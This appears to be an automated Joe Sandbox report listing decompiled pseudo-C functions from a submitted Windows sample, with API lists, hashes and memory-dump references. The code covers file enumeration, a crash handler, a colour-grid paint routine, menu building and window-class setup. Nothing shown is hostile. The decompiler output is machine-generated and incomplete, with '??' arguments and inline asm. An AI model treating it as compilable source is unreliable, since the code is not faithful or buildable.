                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: File$AllocCreateReadSizeVirtual
                                              • String ID: --headless$--height$--server$--signal$--unix$--width$@$P$T
                                              • API String ID: 4119528295-967118136
                                              • Opcode ID: 19c907f5a0b3aa7b1ec6225ffca2f38f174c748eaa55cf8766351e608b9724dd
                                              • Instruction ID: 22302183b55aa192aef797c274213b843b500ec893bfa0413a7b07481166a02b
                                              • Opcode Fuzzy Hash: 19c907f5a0b3aa7b1ec6225ffca2f38f174c748eaa55cf8766351e608b9724dd
                                              • Instruction Fuzzy Hash: 8A220670809218CFDB10DFA8D588BADBBF0FF48304F5089ADE845AB291DB759995CF52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B25347 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 80%
                                              			E00B25347(WCHAR* _a4, signed int _a8, char* _a12) {
				signed int _v8;
				short _v552;
				short _v554;
				struct _WIN32_FIND_DATAW _v600;
				char _v601;
				signed int _v608;
				signed int _v612;
				intOrPtr _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed char _t32;
				void* _t41;
				intOrPtr _t43;
				intOrPtr _t45;
				int _t48;
				signed int* _t59;
				char* _t60;
				WCHAR* _t68;
				signed int _t70;
				void* _t71;

				_t30 =  *0xb34050; // 0xbb40e64e
				_v8 = _t30 ^ _t70;
				_t65 = _a8;
				_t60 = _a12;
				_t68 = _a4;
				_v608 = _t60;
				if(_t65 != _t68) {
					while(E00B254BD( *_t65 & 0x0000ffff) == 0) {
						_t65 = _t65 - 2;
						if(_t65 != _t68) {
							continue;
						}
						break;
					}
					_t60 = _v608;
				}
				_t69 =  *_t65 & 0x0000ffff;
				if(( *_t65 & 0x0000ffff) != 0x3a) {
					L8:
					_t60 =  &_v601;
					_t32 = E00B254BD(_t69);
					_t65 = (_t65 - _t68 >> 1) + 1;
					asm("sbb eax, eax");
					_t59 = 0;
					_v612 =  ~(_t32 & 0x000000ff) & _t65;
					_t69 = FindFirstFileExW(_t68, 0,  &_v600, 0, 0, 0);
					if(_t69 != 0xffffffff) {
						_t59 = _v608;
						_v608 = _t59[1] -  *_t59 >> 2;
						_t41 = 0x2e;
						do {
							if(_v600.cFileName != _t41 || _v554 != 0 && (_v554 != _t41 || _v552 != 0)) {
								_push(_t59);
								_t43 = E00B25293(_t60,  &(_v600.cFileName), _t68, _v612);
								_t71 = _t71 + 0x10;
								_v616 = _t43;
								if(_t43 != 0) {
									FindClose(_t69);
									_t45 = _v616;
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
							goto L21;
							L16:
							_t48 = FindNextFileW(_t69,  &_v600);
							_t41 = 0x2e;
						} while (_t48 != 0);
						_t65 =  *_t59;
						_t63 = _v608;
						_t51 = _t59[1] -  *_t59 >> 2;
						if(_v608 != _t59[1] -  *_t59 >> 2) {
							E00B280B0(_t65, _t65 + _t63 * 4, _t51 - _t63, 4, E00B254E1);
						}
						FindClose(_t69);
						_t45 = 0;
					} else {
						_push(_v608);
						goto L7;
					}
				} else {
					_t8 =  &(_t68[1]); // 0x2
					if(_t65 == _t8) {
						goto L8;
					} else {
						_push(_t60);
						_t59 = 0;
						L7:
						_t45 = E00B25293(_t60, _t68, _t59, _t59);
					}
				}
				L21:
				return E00B1DB25(_t45, _t59, _v8 ^ _t70, _t65, _t68, _t69);
			}

























                                              0x00b25352
                                              0x00b25359
                                              0x00b2535c
                                              0x00b2535f
                                              0x00b25365
                                              0x00b25368
                                              0x00b25370
                                              0x00b25372
                                              0x00b25385
                                              0x00b2538a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b2538a
                                              0x00b2538c
                                              0x00b2538c
                                              0x00b25392
                                              0x00b25398
                                              0x00b253b4
                                              0x00b253b5
                                              0x00b253bb
                                              0x00b253c7
                                              0x00b253ca
                                              0x00b253cc
                                              0x00b253d3
                                              0x00b253e8
                                              0x00b253ed
                                              0x00b253f7
                                              0x00b25407
                                              0x00b2540d
                                              0x00b2540e
                                              0x00b25415
                                              0x00b25434
                                              0x00b25443
                                              0x00b25448
                                              0x00b2544b
                                              0x00b25453
                                              0x00b254a2
                                              0x00b254a8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b25455
                                              0x00b2545d
                                              0x00b25467
                                              0x00b25467
                                              0x00b2546d
                                              0x00b25471
                                              0x00b25477
                                              0x00b2547c
                                              0x00b25497
                                              0x00b2549c
                                              0x00b2547f
                                              0x00b25485
                                              0x00b253ef
                                              0x00b253ef
                                              0x00000000
                                              0x00b253ef
                                              0x00b2539a
                                              0x00b2539a
                                              0x00b2539f
                                              0x00000000
                                              0x00b253a1
                                              0x00b253a1
                                              0x00b253a2
                                              0x00b253a4
                                              0x00b253a7
                                              0x00b253ac
                                              0x00b2539f
                                              0x00b254ae
                                              0x00b254bc

                                              APIs
                                              • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B253E2
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00B2545D
                                              • FindClose.KERNEL32(00000000), ref: 00B2547F
                                              • FindClose.KERNEL32(00000000), ref: 00B254A2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: Find$CloseFile$FirstNext
                                              • String ID:
                                              • API String ID: 1164774033-0
                                              • Opcode ID: b2304af92319fcb0ce3991e0d846fd50eadd60316be8c8ecf029de1ab0df6db8
                                              • Instruction ID: 50e4f1f5ef63a87805db371edfdb36c42f34ce19a56395bd95fd6ec0fb883604
                                              • Opcode Fuzzy Hash: b2304af92319fcb0ce3991e0d846fd50eadd60316be8c8ecf029de1ab0df6db8
                                              • Instruction Fuzzy Hash: D741D371901939AEDB30EF68ED88ABEB3F9EB84355F1041D5E41997244EB309EC08B64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1D72C Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 85%
                                              			E00B1D72C(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00B1D6A0(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00B1FC30(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00B1FC30(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00B1D6A0(_t49);
				}
				return _t49;
			}


































                                              0x00b1d72c
                                              0x00b1d72c
                                              0x00b1d72c
                                              0x00b1d740
                                              0x00b1d742
                                              0x00b1d745
                                              0x00b1d745
                                              0x00b1d749
                                              0x00b1d74e
                                              0x00b1d766
                                              0x00b1d76c
                                              0x00b1d772
                                              0x00b1d778
                                              0x00b1d77e
                                              0x00b1d784
                                              0x00b1d78a
                                              0x00b1d791
                                              0x00b1d798
                                              0x00b1d79f
                                              0x00b1d7a6
                                              0x00b1d7ad
                                              0x00b1d7b4
                                              0x00b1d7b5
                                              0x00b1d7be
                                              0x00b1d7c4
                                              0x00b1d7c7
                                              0x00b1d7cd
                                              0x00b1d7dc
                                              0x00b1d7e8
                                              0x00b1d7f3
                                              0x00b1d7fa
                                              0x00b1d801
                                              0x00b1d80c
                                              0x00b1d814
                                              0x00b1d81d
                                              0x00b1d81f
                                              0x00b1d822
                                              0x00b1d824
                                              0x00b1d82e
                                              0x00b1d836
                                              0x00b1d83c
                                              0x00000000
                                              0x00b1d843
                                              0x00b1d846

                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B1D738
                                              • IsDebuggerPresent.KERNEL32 ref: 00B1D804
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B1D824
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00B1D82E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                              • String ID:
                                              • API String ID: 254469556-0
                                              • Opcode ID: 2c2784d2ecf431b48aa1493d6e8a09912a790838d45e40f36d11ef52c3a37237
                                              • Instruction ID: 848ec15288b6de2e631a85e1eaac00ea143c5a18797a0a4d525b96d4d5696a9a
                                              • Opcode Fuzzy Hash: 2c2784d2ecf431b48aa1493d6e8a09912a790838d45e40f36d11ef52c3a37237
                                              • Instruction Fuzzy Hash: D6311675D4521C9BDB10EFA8D989BCDBBF8AF08304F5040EAE40DAB250EB709A85CF45
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1BF30 Relevance: 42.3, APIs: 28, Instructions: 296COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 48%
                                              			E00B1BF30(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
				long _v12;
				long _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				void* _v124;
				void* _v128;
				intOrPtr _v132;
				long _v136;
				signed int _v140;
				void* _v144;
				struct tagRECT _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _v176;
				void* _v180;
				void* _v184;
				signed int* _v188;
				void* _v204;
				RECT* _v208;
				intOrPtr _v212;
				signed int _v216;
				signed int _v228;
				signed int _v232;
				signed int _v240;
				intOrPtr _v244;
				void* _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v276;
				signed int _v280;
				void* _v292;
				void* _v296;
				int _t176;
				long _t186;
				struct HBRUSH__* _t208;
				long _t214;
				void* _t218;
				intOrPtr _t236;
				void* _t245;
				void* _t326;
				struct HDC__** _t330;
				struct HDC__** _t332;
				struct HDC__** _t336;
				struct HDC__** _t337;
				struct HDC__** _t338;
				struct HDC__** _t341;
				struct HDC__** _t342;
				void* _t343;
				struct HDC__** _t344;

				_t176 = _a8;
				_v160 = _t176;
				if(_t176 == 0xf) {
					BeginPaint(_a4,  &_v80);
					GetClientRect(_a4,  &_v96);
					asm("cdq");
					_v120 = _v96.right / 8;
					_t186 = GetWindowLongW(GetParent(_a4), 8);
					_t330 = _t326 - 0xfffffffffffffff4;
					_v16 = _t186;
					_v116 = 0;
					while(_v116 < 0x10) {
						asm("cdq");
						_v168 = _v116 / 8;
						asm("cdq");
						_v108 = _v168 * _v96.bottom / 2;
						_v164 = _v108;
						asm("cdq");
						_v100 = _v164 + _v96.bottom / 2;
						_v112 = (_v116 & 0x00000007) * _v120;
						_v104 = _v112 + _v120;
						_t208 = CreateSolidBrush( *(_v16 + 4 + _v116 * 4));
						_t332 = _t330 - 4;
						_v124 = _t208;
						 *_t332 = _v80.hdc;
						_v188 =  &_v112;
						_v184 = _v124;
						FillRect(??, ??, ??);
						DeleteObject(_v124);
						_t214 = GetWindowLongW(_a4, 0);
						_t330 = _t332;
						if(_t214 == _v116) {
							_v132 = 2;
							_t218 = SelectObject(_v80.hdc, GetStockObject(6));
							_t336 = _t330 - 0xfffffffffffffffc;
							_v128 = _t218;
							_v104 = _v104 + 0xffffffff;
							_v100 = _v100 + 0xffffffff;
							while(1) {
								 *_t336 = _v80.hdc;
								_v216 = _v112;
								_v212 = _v100;
								_v208 = 0;
								MoveToEx(??, ??, ??, ??);
								_t337 = _t336 - 0x10;
								 *_t337 = _v80.hdc;
								_v232 = _v112;
								_v228 = _v108;
								LineTo(??, ??, ??);
								_t338 = _t337 - 0xc;
								 *_t338 = _v80.hdc;
								_v244 = _v104;
								_v240 = _v108;
								LineTo(??, ??, ??);
								SelectObject(_v80.hdc, GetStockObject(7));
								_t341 = _t338;
								 *_t341 = _v80.hdc;
								_v268 = _v104;
								_v264 = _v100;
								LineTo(??, ??, ??);
								_t342 = _t341 - 0xc;
								 *_t342 = _v80.hdc;
								_v280 = _v112;
								_v276 = _v100;
								LineTo(??, ??, ??);
								_t343 = _t342 - 0xc;
								_t236 = _v132 + 0xffffffff;
								_v132 = _t236;
								if(_t236 == 0) {
									break;
								}
								_v112 = _v112 + 1;
								_v108 = _v108 + 1;
								_v104 = _v104 + 0xffffffff;
								_v100 = _v100 + 0xffffffff;
								_t245 = GetStockObject(6);
								_t344 = _t343 - 4;
								 *_t344 = _v80.hdc;
								_v296 = _t245;
								SelectObject(??, ??);
								_t336 = _t344 - 8;
							}
							SelectObject(_v80, _v128);
							_t330 = _t343 - 8;
						}
						_v116 = _v116 + 1;
					}
					EndPaint(_a4,  &_v80);
					goto L17;
				} else {
					if(_v160 == 0x201) {
						GetClientRect(_a4,  &_v156);
						asm("cdq");
						_v140 = _v156.right / 8;
						_v172 = _a16 >> 0x00000010 & 0xffff;
						asm("cdq");
						_t262 =  >=  ? 8 : 0;
						_v136 =  >=  ? 8 : 0;
						asm("cdq");
						_v136 = (_a16 & 0xffff) / _v140 + _v136;
						SetWindowLongW(_a4, 0, _v136);
						InvalidateRect(GetDlgItem(GetParent(_a4), 0x206), 0, 0);
						InvalidateRect(_a4, 0, 0);
						L17:
						_v12 = 0;
					} else {
						_v12 = DefWindowProcW(_a4, _a8, _a12, _a16);
					}
				}
				return _v12;
			}




























































                                              0x00b1bf46
                                              0x00b1bf49
                                              0x00b1bf52
                                              0x00b1bf80
                                              0x00b1bf96
                                              0x00b1bfa7
                                              0x00b1bfaa
                                              0x00b1bfc7
                                              0x00b1bfcd
                                              0x00b1bfd0
                                              0x00b1bfd3
                                              0x00b1bfda
                                              0x00b1bfec
                                              0x00b1bfef
                                              0x00b1bffd
                                              0x00b1c00b
                                              0x00b1c011
                                              0x00b1c01f
                                              0x00b1c02c
                                              0x00b1c039
                                              0x00b1c042
                                              0x00b1c052
                                              0x00b1c058
                                              0x00b1c05b
                                              0x00b1c067
                                              0x00b1c06a
                                              0x00b1c06e
                                              0x00b1c072
                                              0x00b1c081
                                              0x00b1c09a
                                              0x00b1c0a0
                                              0x00b1c0a6
                                              0x00b1c0ac
                                              0x00b1c0cd
                                              0x00b1c0d3
                                              0x00b1c0d6
                                              0x00b1c0df
                                              0x00b1c0e8
                                              0x00b1c0eb
                                              0x00b1c0f6
                                              0x00b1c0f9
                                              0x00b1c0fd
                                              0x00b1c101
                                              0x00b1c109
                                              0x00b1c10f
                                              0x00b1c11b
                                              0x00b1c11e
                                              0x00b1c122
                                              0x00b1c126
                                              0x00b1c12c
                                              0x00b1c138
                                              0x00b1c13b
                                              0x00b1c13f
                                              0x00b1c143
                                              0x00b1c166
                                              0x00b1c16c
                                              0x00b1c178
                                              0x00b1c17b
                                              0x00b1c17f
                                              0x00b1c183
                                              0x00b1c189
                                              0x00b1c195
                                              0x00b1c198
                                              0x00b1c19c
                                              0x00b1c1a0
                                              0x00b1c1a6
                                              0x00b1c1ac
                                              0x00b1c1af
                                              0x00b1c1b5
                                              0x00000000
                                              0x00000000
                                              0x00b1c1c6
                                              0x00b1c1cf
                                              0x00b1c1d8
                                              0x00b1c1e1
                                              0x00b1c1eb
                                              0x00b1c1f1
                                              0x00b1c1f7
                                              0x00b1c1fa
                                              0x00b1c1fe
                                              0x00b1c204
                                              0x00b1c204
                                              0x00b1c219
                                              0x00b1c21f
                                              0x00b1c21f
                                              0x00b1c22d
                                              0x00b1c22d
                                              0x00b1c242
                                              0x00000000
                                              0x00b1bf58
                                              0x00b1bf68
                                              0x00b1c260
                                              0x00b1c274
                                              0x00b1c277
                                              0x00b1c28b
                                              0x00b1c29c
                                              0x00b1c2b0
                                              0x00b1c2b3
                                              0x00b1c2c4
                                              0x00b1c2d1
                                              0x00b1c2f1
                                              0x00b1c332
                                              0x00b1c353
                                              0x00b1c38d
                                              0x00b1c38d
                                              0x00b1bf6e
                                              0x00b1c385
                                              0x00b1c385
                                              0x00b1bf68
                                              0x00b1c39f

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: Rect$Window$LongObject$ClientInvalidateParent$BeginBrushCreateDeleteFillItemPaintProcSelectSolidStock
                                              • String ID:
                                              • API String ID: 88183673-0
                                              • Opcode ID: fc267d4952ad0f2efcd7e8d8740b12dc93e2ed3a74eb4603dbcac7476299d87b
                                              • Instruction ID: bb6d82cca0f0a7bb85f95a4386a2221fbdd94319ed0e82db42415277c7912078
                                              • Opcode Fuzzy Hash: fc267d4952ad0f2efcd7e8d8740b12dc93e2ed3a74eb4603dbcac7476299d87b
                                              • Instruction Fuzzy Hash: 8BD16EB59043189FCB14EFACD58969DBBF1BB48300F20896DE899EB350DB349994CF46
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1AE30 Relevance: 31.7, APIs: 21, Instructions: 226windowCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 49%
                                              			E00B1AE30(struct HMENU__* _a4, intOrPtr _a8) {
				int _v8;
				struct HINSTANCE__* _v12;
				struct HMENU__* _v16;
				short _v528;
				void* _v536;
				void* _v540;
				void* _v544;
				int _v548;
				int _v552;
				int _v556;
				int _v560;
				int _v564;
				int _v568;
				int _v572;
				WCHAR* _v576;
				int _v580;
				struct HINSTANCE__* _t129;
				int _t131;
				int _t135;
				int _t139;
				int _t143;
				int _t147;
				int _t151;
				int _t155;
				int _t159;
				int _t163;
				void* _t199;
				void* _t200;
				void* _t218;
				struct HINSTANCE__** _t225;
				struct HMENU__** _t226;

				_t129 = GetModuleHandleW(0);
				_t200 = _t199 - 4;
				_v12 = _t129;
				if(_a4 != 0) {
					_v16 = CreateMenu();
					if(_v16 != 0) {
						_t131 =  &_v528;
						_v548 = _t131;
						0x710000();
						LoadStringW(_v12, 0x110,  &_v528, _t131);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x110,  &_v528);
						_t135 =  &_v528;
						_v552 = _t135;
						0x710000();
						LoadStringW(_v12, 0x111,  &_v528, _t135);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x111,  &_v528);
						_t139 =  &_v528;
						_v556 = _t139;
						0x710000();
						LoadStringW(_v12, 0x112,  &_v528, _t139);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x112,  &_v528);
						_t143 =  &_v528;
						_v560 = _t143;
						0x710000();
						LoadStringW(_v12, 0x113,  &_v528, _t143);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x113,  &_v528);
						_t147 =  &_v528;
						_v564 = _t147;
						0x710000();
						LoadStringW(_v12, 0x114,  &_v528, _t147);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x114,  &_v528);
						_t151 =  &_v528;
						_v568 = _t151;
						0x710000();
						LoadStringW(_v12, 0x115,  &_v528, _t151);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x115,  &_v528);
						_t218 = _t200 - 0xffffffffffffff18;
						if(_a8 != 0) {
							InsertMenuW(_a4, 0xffffffff, 0xc00, 0, 0);
							_t218 = _t218 - 0x14;
						}
						_t155 =  &_v528;
						_v572 = _t155;
						0x710000();
						LoadStringW(_v12, 0x100,  &_v528, _t155);
						InsertMenuW(_a4, 0xffffffff, 0x410, _v16,  &_v528);
						_t159 =  &_v528;
						_v576 = _t159;
						0x710000();
						LoadStringW(_v12, 0x101,  &_v528, _t159);
						InsertMenuW(_a4, 0xffffffff, 0x400, 0x101,  &_v528);
						_t163 =  &_v528;
						_v580 = _t163;
						0x710000();
						_t225 = _t218 - 0xffffffffffffffb4;
						 *_t225 = _v12;
						_v580 = 0x102;
						_v576 =  &_v528;
						_v572 = _t163;
						LoadStringW(??, ??, ??, ??);
						_t226 = _t225 - 0x10;
						 *_t226 = _a4;
						_v580 = 0xffffffff;
						_v576 = 0x400;
						_v572 = 0x102;
						_v568 =  &_v528;
						InsertMenuW(??, ??, ??, ??, ??);
						_t200 = _t226 - 0x14;
						_v8 = 1;
					} else {
						_v8 = 0;
					}
				} else {
					_v8 = 0;
				}
				return _v8;
			}


































                                              0x00b1ae48
                                              0x00b1ae4e
                                              0x00b1ae51
                                              0x00b1ae58
                                              0x00b1ae70
                                              0x00b1ae77
                                              0x00b1ae89
                                              0x00b1ae8f
                                              0x00b1ae92
                                              0x00b1aeb6
                                              0x00b1aee7
                                              0x00b1aef0
                                              0x00b1aef6
                                              0x00b1aef9
                                              0x00b1af1d
                                              0x00b1af4e
                                              0x00b1af57
                                              0x00b1af5d
                                              0x00b1af60
                                              0x00b1af84
                                              0x00b1afb5
                                              0x00b1afbe
                                              0x00b1afc4
                                              0x00b1afc7
                                              0x00b1afeb
                                              0x00b1b01c
                                              0x00b1b025
                                              0x00b1b02b
                                              0x00b1b02e
                                              0x00b1b052
                                              0x00b1b083
                                              0x00b1b08c
                                              0x00b1b092
                                              0x00b1b095
                                              0x00b1b0b9
                                              0x00b1b0ea
                                              0x00b1b0f0
                                              0x00b1b0f7
                                              0x00b1b125
                                              0x00b1b12b
                                              0x00b1b12b
                                              0x00b1b12e
                                              0x00b1b134
                                              0x00b1b137
                                              0x00b1b15b
                                              0x00b1b18b
                                              0x00b1b194
                                              0x00b1b19a
                                              0x00b1b19d
                                              0x00b1b1c1
                                              0x00b1b1f2
                                              0x00b1b1fb
                                              0x00b1b201
                                              0x00b1b204
                                              0x00b1b209
                                              0x00b1b215
                                              0x00b1b218
                                              0x00b1b220
                                              0x00b1b224
                                              0x00b1b228
                                              0x00b1b22e
                                              0x00b1b23a
                                              0x00b1b23d
                                              0x00b1b245
                                              0x00b1b24d
                                              0x00b1b255
                                              0x00b1b259
                                              0x00b1b25f
                                              0x00b1b262
                                              0x00b1ae7d
                                              0x00b1ae7d
                                              0x00b1ae7d
                                              0x00b1ae5e
                                              0x00b1ae5e
                                              0x00b1ae5e
                                              0x00b1b273

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: CreateHandleMenuModule
                                              • String ID:
                                              • API String ID: 4123625242-0
                                              • Opcode ID: 76a04c0e59038a697f5b9bd5c3a50ca937efec981bb2bd9394da02383be21dd4
                                              • Instruction ID: 45060000b88b4b4334477f7fa6110d8ddb29ca0b5ddac1d42a4480dc5aea9d93
                                              • Opcode Fuzzy Hash: 76a04c0e59038a697f5b9bd5c3a50ca937efec981bb2bd9394da02383be21dd4
                                              • Instruction Fuzzy Hash: 64C1B4B48083189FD714EF68D44969EBBF4FB44310F10CA6DE8A997395DB789688CF42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1BCD2 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 135COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.393507190.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000002.00000002.393394170.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393529256.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393542517.0000000000B34000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.393551749.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: LongTextWindow$ColorObjectPaintSelect$BeginBrushCreateFillHandleItemLoadModuleParentRectSolidString
                                              • String ID: ASCII: abcXYZ
                                              • API String ID: 3404974346-732927841
                                              • Opcode ID: c4c0903b52ad28736a2c99d1188904acb4d37163e4a14931e1d9f574b5432403
                                              • Instruction ID: ca5c14e6f493724afd9b6a9f286210f73c797b948b0e71aaade16d1ba420b983
                                              • Opcode Fuzzy Hash: c4c0903b52ad28736a2c99d1188904acb4d37163e4a14931e1d9f574b5432403
                                              • Instruction Fuzzy Hash: 0E6195B58083149FCB04EFA8D58869EBFF4BF48301F10896DE88997354EB749988CF52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1A680 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181registryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 29%
                                              			E00B1A680(void* __edi, struct HINSTANCE__* _a4, intOrPtr _a8) {
				intOrPtr _v12;
				char _v216;
				char _v428;
				struct _WNDCLASSW _v468;
				char _v980;
				struct HINSTANCE__* _v984;
				char* _v988;
				char* _v992;
				char* _v996;
				intOrPtr _v1000;
				void* _v1008;
				intOrPtr _v1012;
				struct HINSTANCE__* _v1016;
				intOrPtr _v1020;
				char* _v1024;
				struct HINSTANCE__* _t110;
				struct HINSTANCE__* _t115;
				int _t117;
				intOrPtr* _t118;
				void* _t155;
				void* _t156;
				struct HINSTANCE__** _t165;
				struct HINSTANCE__** _t166;
				intOrPtr* _t167;
				intOrPtr* _t169;

				_t153 = __edi;
				L00B2B0CA();
				E00B1FC30(__edi,  &_v428, 0, 0xd4);
				_v428 = _a4;
				if(_a8 == 0) {
					_v1016 = 0;
					_v1012 =  &_v428 + 4;
					E00B13370(_t153);
					_t156 = _t155 - 8;
				} else {
					_v1016 = _a4;
					_v1012 =  &_v428 + 4;
					E00B1B960();
					_t156 = _t155 - 8;
				}
				E00B1F6B0( &_v216,  &_v428 + 4, 0xcc);
				_v468.style = 0;
				_v468.lpfnWndProc = E00B1BBB0;
				_v468.cbClsExtra = 0;
				_v468.cbWndExtra = 4;
